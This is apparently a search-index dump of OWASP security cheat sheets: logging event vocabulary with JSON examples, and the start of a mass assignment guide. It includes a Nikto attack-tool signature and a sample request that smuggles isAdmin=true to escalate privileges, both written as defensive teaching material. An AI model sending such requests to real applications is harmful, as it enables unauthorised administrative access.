{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authn_impossible_travel:joebob1,US-OR,CN-SH\",\n    \"level\": \"CRITICAL\",\n    \"description\": \"User joebob1 has accessed the application in two distant cities at the same time\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_token_createduserid-entitlements","title":"authn_token_created[:userid, entitlement(s)]","text":"

Description When a token is created for service access it should be recorded

Level: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"aws.foobar.com\",\n    \"event\": \"authn_token_created:app.foobarapi.prod,create,read,update\",\n    \"level\": \"INFO\",\n    \"description\": \"A token has been created for app.foobarapi.prod with create,read,update\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_token_revokeduseridtokenid","title":"authn_token_revoked[:userid,tokenid]","text":"

Description A token has been revoked for the given account.

Level: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"aws.foobar.com\",\n    \"event\": \"authn_token_revoked:app.foobarapi.prod,xyz-abc-123-gfk\",\n    \"level\": \"INFO\",\n    \"description\": \"Token ID: xyz-abc-123-gfk was revoked for user app.foobarapi.prod\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_token_reuseuseridtokenid","title":"authn_token_reuse[:userid,tokenid]","text":"

Description A previously revoked token was attempted to be reused.

Level: CRITICAL

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"aws.foobar.com\",\n    \"event\": \"authn_token_reuse:app.foobarapi.prod,xyz-abc-123-gfk\",\n    \"level\": \"CRITICAL\",\n    \"description\": \"User app.foobarapi.prod attempted to use token ID: xyz-abc-123-gfk which was previously revoked\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_token_deleteappid","title":"authn_token_delete[:appid]","text":"

Description When a token is deleted it should be recorded

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authn_token_delete:foobarapi\",\n    \"level\": \"WARN\",\n    \"description\": \"The token for foobarapi has been deleted\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authorization-authz","title":"Authorization [AUTHZ]","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authz_failuseridresource","title":"authz_fail[:userid,resource]","text":"

Description An attempt was made to access a resource which was unauthorized

Level: CRITICAL

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authz_fail:joebob1,resource\",\n    \"level\": \"CRITICAL\",\n    \"description\": \"User joebob1 attempted to access a resource without entitlement\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authz_changeuseridfromto","title":"authz_change[:userid,from,to]","text":"

Description The entitlements of the user or entity were changed

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authz_change:joebob1,user,admin\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 access was changed from user to admin\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authz_adminuseridevent","title":"authz_admin[:userid,event]","text":"

Description All activity by privileged users such as admin should be recorded.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authz_admin:joebob1,user_privilege_change\",\n    \"level\": \"WARN\",\n    \"description\": \"Administrtator joebob1 has updated privileges of user foobarapi from user to admin\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#excessive-use-excess","title":"Excessive Use [EXCESS]","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#excess_rate_limit_exceededuseridmax","title":"excess_rate_limit_exceeded[userid,max]","text":"

Description Expected service limit ceilings should be established and alerted when exceeded, even if simply for managing costs and scaling.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"excess_rate_limit_exceeded:app.foobarapi.prod,100000\",\n    \"level\": \"WARN\",\n    \"description\": \"User app.foobarapi.prod has exceeded max:100000 requests\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#file-upload-upload","title":"File Upload [UPLOAD]","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#upload_completeuseridfilenametype","title":"upload_complete[userid,filename,type]","text":"

Description On a successful file upload, the first step in the validation process is confirming that the upload has completed.

Level: INFO

Example:

    {\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"upload_complete:joebob1,user_generated_content.png,PNG\",\n    \"level\": \"INFO\",\n    \"description\": \"User joebob1 has uploaded user_generated_content.png\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#upload_storedfilenamefromto","title":"upload_stored[filename,from,to]","text":"

Description One step in good file upload validation is to move/rename the file and when providing the content back to end users, never reference the original filename in the download. This is true both when storing in a filesystem as well as in block storage.

Level: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"upload_stored:user_generated_content.png,kjsdhkrjhwijhsiuhdf000010202002\",\n    \"level\": \"INFO\",\n    \"description\": \"File user_generated_content.png was stored in the database with key abcdefghijk101010101\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#upload_validationfilenamevirusscanimagemagickfailedincompletepassed","title":"upload_validation[filename,(virusscan|imagemagick|...):(FAILED|incomplete|passed)]","text":"

Description All file uploads should have some validation performed, both for correctness (is in fact of file type x), and for safety (does not contain a virus).

Level: INFO|CRITICAL

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"upload_validation:filename,virusscan:FAILED\",\n    \"level\": \"CRITICAL\",\n    \"description\": \"File user_generated_content.png FAILED virus scan and was purged\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#upload_deleteuseridfileid","title":"upload_delete[userid,fileid]","text":"

Description When a file is deleted for normal reasons it should be recorded.

Level: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"upload_delete:joebob1,\",\n    \"level\": \"INFO\",\n    \"description\": \"User joebob1 has marked file abcdefghijk101010101 for deletion.\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#input-validation-input","title":"Input Validation [INPUT]","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#input_validation_failfielduserid","title":"input_validation_fail[:field,userid]","text":"

Description When input validation fails on the server-side it must either be because a) sufficient validation was not provided on the client, or b) client-side validation was bypassed. In either case it's an opportunity for attack and should be mitigated quickly.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"input_validation_fail:date_of_birth,joebob1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 submitted data that failed validation.\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#malicious-behavior-malicious","title":"Malicious Behavior [MALICIOUS","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#malicious_excess_404useridipuseragent","title":"malicious_excess_404:[userid|IP,useragent]","text":"

Description When a user makes numerous requests for files that don't exist, it is often an indicator of attempts to \"force-browse\" for files that could exist, and such behavior often indicates malicious intent.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"malicious_excess404:123.456.789.101,M@l1c10us-Hax0rB0t0-v1\",\n    \"level\": \"WARN\",\n    \"description\": \"A user at 123.456.789.101 has generated a large number of 404 requests.\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#malicious_extraneoususeridipinputnameuseragent","title":"malicious_extraneous:[userid|IP,inputname,useragent]","text":"

Description When a user submits data to a backend handler that was not expected, it can indicate probing for input validation errors. If your backend service receives data it does not handle or have an input for, this is an indication of likely malicious abuse.

Level: CRITICAL

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"malicious_extraneous:dr@evil.com,creditcardnum,Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0\",\n    \"level\": \"WARN\",\n    \"description\": \"User dr@evil.com included field creditcardnum in the request which is not handled by this service.\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#malicious_attack_tooluseridiptoolnameuseragent","title":"malicious_attack_tool:[userid|IP,toolname,useragent]","text":"

Description When obvious attack tools are identified either by signature or by user agent they should be logged.

TODO: A future version of this standard should link to known attack tools, signatures and user-agent strings. For instance, the tool \"Nikto\" leaves behind its user agent by default with a string like \"Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:Port Check)\"

Level: CRITICAL

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"malicious_attack_tool:127.0.0.1,nikto,Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:Port Check)\",\n    \"level\": \"WARN\",\n    \"description\": \"Attack traffic indicating use of Nikto coming from 127.0.0.1\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#malicious_corsuseridipuseragentreferer","title":"malicious_cors:[userid|IP,useragent,referer]","text":"

Description When attempts are made from unauthorized origins they should of course be blocked, but also logged whenever possible. Even if we block an illegal cross-origin request the fact that the request is being made could be an indication of attack.

NOTE: Did you know that the word \"referer\" is misspelled in the original HTTP specification? The correct spelling should be \"referrer\" but the original typo persists to this day and is used here intentionally.

Level: CRITICAL

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"malicious_cors:127.0.0.1,Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0,attack.evil.com\",\n    \"level\": \"WARN\",\n    \"description\": \"An illegal cross-origin request from 127.0.0.1 was referred from attack.evil.com\"\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#malicious_direct_referenceuseridip-useragent","title":"malicious_direct_reference:[userid|IP, useragent]","text":"

Description A common attack against authentication and authorization is to directly access an object without credentials or appropriate access authority. This flaw used to be listed in the OWASP Top Ten as Insecure Direct Object Reference. Assuming you've correctly prevented this attack, logging the attempt is valuable to identify malicious users.

Level: CRITICAL

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"malicious_direct:joebob1, Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 attempted to access an object to which they are not authorized\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#privilege-changes-privilege","title":"Privilege Changes [PRIVILEGE]","text":"

This section focuses on object privilege changes such as read/write/execute permissions or objects in a database having authorization meta-information changed.

Changes to user/account are covered in the User Management section.

"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#privilege_permissions_changeduseridfileobjectfromleveltolevel","title":"privilege_permissions_changed:[userid,file|object,fromlevel,tolevel]","text":"

Description Tracking changes to objects to which there are access control restrictions can uncover attempts by unauthorized users to escalate privilege on those files.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"malicious_direct:joebob1, /users/admin/some/important/path,0511,0777\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 changed permissions on /users/admin/some/important/path\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sensitive-data-changes-data","title":"Sensitive Data Changes [DATA]","text":"

It's not necessary to log or alert on changes to all files, but in the case of highly sensitive files or data it is important that we monitor and alert on changes.

"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sensitive_createuseridfileobject","title":"sensitive_create:[userid,file|object]","text":"

Description When a new piece of data is created and marked as sensitive or placed into a directory/table/repository where sensitive data is stored, that creation should be logged and reviewed periodically.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sensitive_create:joebob1, /users/admin/some/important/path\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 created a new file in /users/admin/some/important/path\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sensitive_readuseridfileobject","title":"sensitive_read:[userid,file|object]","text":"

Description All data marked as sensitive or placed into a directory/table/repository where sensitive data is stored should have access logged and reviewed periodically.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sensitive_read:joebob1, /users/admin/some/important/path\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 read file /users/admin/some/important/path\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sensitive_updateuseridfileobject","title":"sensitive_update:[userid,file|object]","text":"

Description All data marked as sensitive or placed into a directory/table/repository where sensitive data is stored should have updates to the data logged and reviewed periodically.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sensitive_update:joebob1, /users/admin/some/important/path\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 modified file /users/admin/some/important/path\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sensitive_deleteuseridfileobject","title":"sensitive_delete:[userid,file|object]","text":"

Description All data marked as sensitive or placed into a directory/table/repository where sensitive data is stored should have deletions of the data logged and reviewed periodically. The file should not be immediately deleted but marked for deletion and an archive of the file should be maintained according to legal/privacy requirements.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sensitive_delete:joebob1, /users/admin/some/important/path\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 marked file /users/admin/some/important/path for deletion\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sequence-errors-sequence","title":"Sequence Errors [SEQUENCE]","text":"

Also called a business logic attack, if a specific path is expected through a system and an attempt is made to skip or change the order of that path it could indicate malicious intent.

"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sequence_failuserid","title":"sequence_fail:[userid]","text":"

Description When a user reaches a part of the application out of sequence it may indicate intentional abuse of the business logic and should be tracked.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sequence_fail:joebob1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 has reached a part of the application out of the normal application flow.\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#session-management-session","title":"Session Management [SESSION]","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#session_createduserid","title":"session_created:[userid]","text":"

Description When a new authenticated session is created that session may be logged and activity monitored.

Level: INFO

Example:

    {\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"session_created:joebob1\",\n    \"level\": \"INFO\",\n    \"description\": \"User joebob1 has started a new session\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#session_reneweduserid","title":"session_renewed:[userid]","text":"

Description When a user is warned that their session is about to expire or be revoked and chooses to extend it, that activity should be logged. Also, if the system in question contains highly confidential data then extending a session may require additional verification.

Level: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"session_renewed:joebob1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 was warned of expiring session and extended.\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#session_expireduseridreason","title":"session_expired:[userid,reason]","text":"

Description When a session expires, especially in the case of an authenticated session or one involving sensitive data, that session expiry may be logged and clarifying data included. The reason code may be any value, such as: logout, timeout, revoked, etc. Sessions should never be deleted but rather expired when revocation is required.

Level: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"session_expired:joebob1,revoked\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 session expired due to administrator revocation.\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#session_use_after_expireuserid","title":"session_use_after_expire:[userid]","text":"

Description In the case that a user attempts to access systems with an expired session, it may be helpful to log the attempt, especially if combined with a subsequent login failure. This could identify a case where a malicious user is attempting a session hijack or directly accessing another person's machine/browser.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"session_use_after_expire:joebob1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 attempted access after session expired.\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#system-events-sys","title":"System Events [SYS]","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sys_startupuserid","title":"sys_startup:[userid]","text":"

Description When a system is first started it can be valuable to log the startup, even if the system is serverless or a container, especially if possible to log the user that initiated the system.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sys_startup:joebob1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 spawned a new instance\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sys_shutdownuserid","title":"sys_shutdown:[userid]","text":"

Description When a system is shut down it can be valuable to log the event, even if the system is serverless or a container, especially if possible to log the user that initiated the system.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sys_shutdown:joebob1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 stopped this instance\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sys_restartuserid","title":"sys_restart:[userid]","text":"

Description When a system is restarted it can be valuable to log the event, even if the system is serverless or a container, especially if possible to log the user that initiated the system.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sys_restart:joebob1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 initiated a restart\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sys_crashreason","title":"sys_crash[:reason]","text":"

Description If possible to catch an unstable condition resulting in the crash of a system, logging that event could be helpful, especially if the event is triggered by an attack.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sys_crash:outofmemory,\n    \"level\": \"WARN\",\n    \"description\": \"The system crashed due to Out of Memory error.\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sys_monitor_disableduseridmonitor","title":"sys_monitor_disabled:[userid,monitor]","text":"

Description If your systems contain agents responsible for file integrity, resources, logging, virus, etc. it is especially valuable to know if they are halted and by whom.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sys_monitor_disabled:joebob1,crowdstrike\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 has disabled CrowdStrike\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sys_monitor_enableduseridmonitor","title":"sys_monitor_enabled:[userid,monitor]","text":"

Description If your systems contain agents responsible for file integrity, resources, logging, virus, etc. it is especially valuable to know if they are started again after being stopped, and by whom.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sys_monitor_enabled:joebob1,crowdstrike\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 has enabled CrowdStrike\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#user-management-user","title":"User Management [USER]","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#user_createduseridnewuseridattributesonetwothree","title":"user_created:[userid,newuserid,attributes[one,two,three]]","text":"

Description When creating new users, logging the specifics of the user creation event is helpful, especially if new users can be created with administration privileges.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"user_created:joebob1,user1,admin:create,update,delete\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 created user1 with admin:create,update,delete privilege attributes\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#user_updateduseridonuseridattributesonetwothree","title":"user_updated:[userid,onuserid,attributes[one,two,three]]","text":"

Description When updating users, logging the specifics of the user update event is helpful, especially if users can be updated with administration privileges.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"user_updated:joebob1,user1,admin:create,update,delete\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 updated user1 with attributes admin:create,update,delete privilege attributes\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#user_archiveduseridonuserid","title":"user_archived:[userid,onuserid]","text":"

Description It is always best to archive users rather than deleting, except where required. When archiving users, logging the specifics of the user archive event is helpful. A malicious user could use this feature to deny service to legitimate users.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"user_archived:joebob1,user1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 archived user1\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#user_deleteduseridonuserid","title":"user_deleted:[userid,onuserid]","text":"

Description It is always best to archive users rather than deleting, except where required. When deleting users, logging the specifics of the user delete event is helpful. A malicious user could use this feature to deny service to legitimate users.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"user_deleted:joebob1,user1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 has deleted user1\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#exclusions","title":"Exclusions","text":"

As important as what you DO log is what you DON'T log. Private or secret information, source code, keys, certs, etc. should never be logged.

For a comprehensive overview of items that should be excluded from logging, please see the OWASP Logging Cheat Sheet.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html","title":"Mass Assignment Cheat Sheet","text":""},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#introduction","title":"Introduction","text":""},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#definition","title":"Definition","text":"

Software frameworks sometimes allow developers to automatically bind HTTP request parameters into program code variables or objects to make using that framework easier for developers. This can sometimes cause harm.

Attackers can sometimes use this methodology to create new parameters that the developer never intended, which in turn creates or overwrites variables or objects in program code that were not intended.

This is called a Mass Assignment vulnerability.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#alternative-names","title":"Alternative Names","text":"

Depending on the language/framework in question, this vulnerability can have several alternative names:

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#example","title":"Example","text":"

Suppose there is a form for editing a user's account information:

<form>\n\u00a0\u00a0\u00a0\u00a0\u00a0<input name=\"userid\" type=\"text\">\n\u00a0\u00a0\u00a0\u00a0\u00a0<input name=\"password\" type=\"text\">\n\u00a0\u00a0\u00a0\u00a0\u00a0<input name=\"email\" text=\"text\">\n\u00a0\u00a0\u00a0\u00a0\u00a0<input type=\"submit\">\n</form>\u00a0\u00a0\n

Here is the object that the form is binding to:

public\u00a0class\u00a0User\u00a0{\nprivate\u00a0String\u00a0userid;\nprivate\u00a0String\u00a0password;\nprivate\u00a0String\u00a0email;\nprivate\u00a0boolean\u00a0isAdmin;\n\n//Getters\u00a0&\u00a0Setters\n}\n

Here is the controller handling the request:

@RequestMapping(value\u00a0=\u00a0\"/addUser\",\u00a0method\u00a0=\u00a0RequestMethod.POST)\npublic\u00a0String\u00a0submit(User\u00a0user)\u00a0{\nuserService.add(user);\nreturn\u00a0\"successPage\";\n}\n

Here is the typical request:

POST\u00a0/addUser\n...\nuserid=bobbytables&password=hashedpass&email=bobby@tables.com\n

And here is the exploit in which we set the value of the attribute isAdmin of the instance of the class User:

POST\u00a0/addUser\n...\nuserid=bobbytables&password=hashedpass&email=bobby@tables.com&isAdmin=true\n
"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#exploitability","title":"Exploitability","text":"

This functionality becomes exploitable when:

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#github-case-study","title":"GitHub case study","text":"

In 2012, GitHub was hacked using mass assignment. A user was able to upload his public key to any organization and thus make any subsequent changes in their repositories. GitHub's Blog Post.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#solutions","title":"Solutions","text":""},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#general-solutions","title":"General Solutions","text":"

An architectural approach is to create Data Transfer Objects and avoid binding input directly to domain objects. Only the fields that are meant to be editable by the user are included in the DTO.

public\u00a0class\u00a0UserRegistrationFormDTO\u00a0{\nprivate\u00a0String\u00a0userid;\nprivate\u00a0String\u00a0password;\nprivate\u00a0String\u00a0email;\n\n//NOTE:\u00a0isAdmin\u00a0field\u00a0is\u00a0not\u00a0present\n\n//Getters\u00a0&\u00a0Setters\n}\n
"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#language-framework-specific-solutions","title":"Language & Framework specific solutions","text":""},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#spring-mvc","title":"Spring MVC","text":""},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#allow-listing","title":"Allow-listing","text":"
@Controller\npublic\u00a0class\u00a0UserController\n{\n@InitBinder\npublic\u00a0void\u00a0initBinder(WebDataBinder\u00a0binder,\u00a0WebRequest\u00a0request)\n{\nbinder.setAllowedFields(\"userid\",\u00a0\"password\",\u00a0\"email\");\n}\n...\n}\n

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#block-listing","title":"Block-listing","text":"
@Controller\npublic\u00a0class\u00a0UserController\n{\n@InitBinder\npublic\u00a0void\u00a0initBinder(WebDataBinder\u00a0binder,\u00a0WebRequest\u00a0request)\n{\nbinder.setDisallowedFields(\"isAdmin\");\n}\n...\n}\n

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#nodejs-mongoose","title":"NodeJS + Mongoose","text":""},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#allow-listing_1","title":"Allow-listing","text":"
var\u00a0UserSchema\u00a0=\u00a0new\u00a0mongoose.Schema({\nuserid:\u00a0String,\npassword:\u00a0String,\nemail\u00a0:\u00a0String,\nisAdmin\u00a0:\u00a0Boolean,\n});\n\nUserSchema.statics\u00a0=\u00a0{\nuserCreateSafeFields:\u00a0['userid',\u00a0'password',\u00a0'email']\n};\n\nvar\u00a0User\u00a0=\u00a0mongoose.model('User',\u00a0UserSchema);\n\nvar\u00a0_\u00a0=\u00a0require('underscore');\nvar\u00a0user\u00a0=\u00a0new\u00a0User(_.pick(req.body,\u00a0User.userCreateSafeFields));\n

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#block-listing_1","title":"Block-listing","text":"
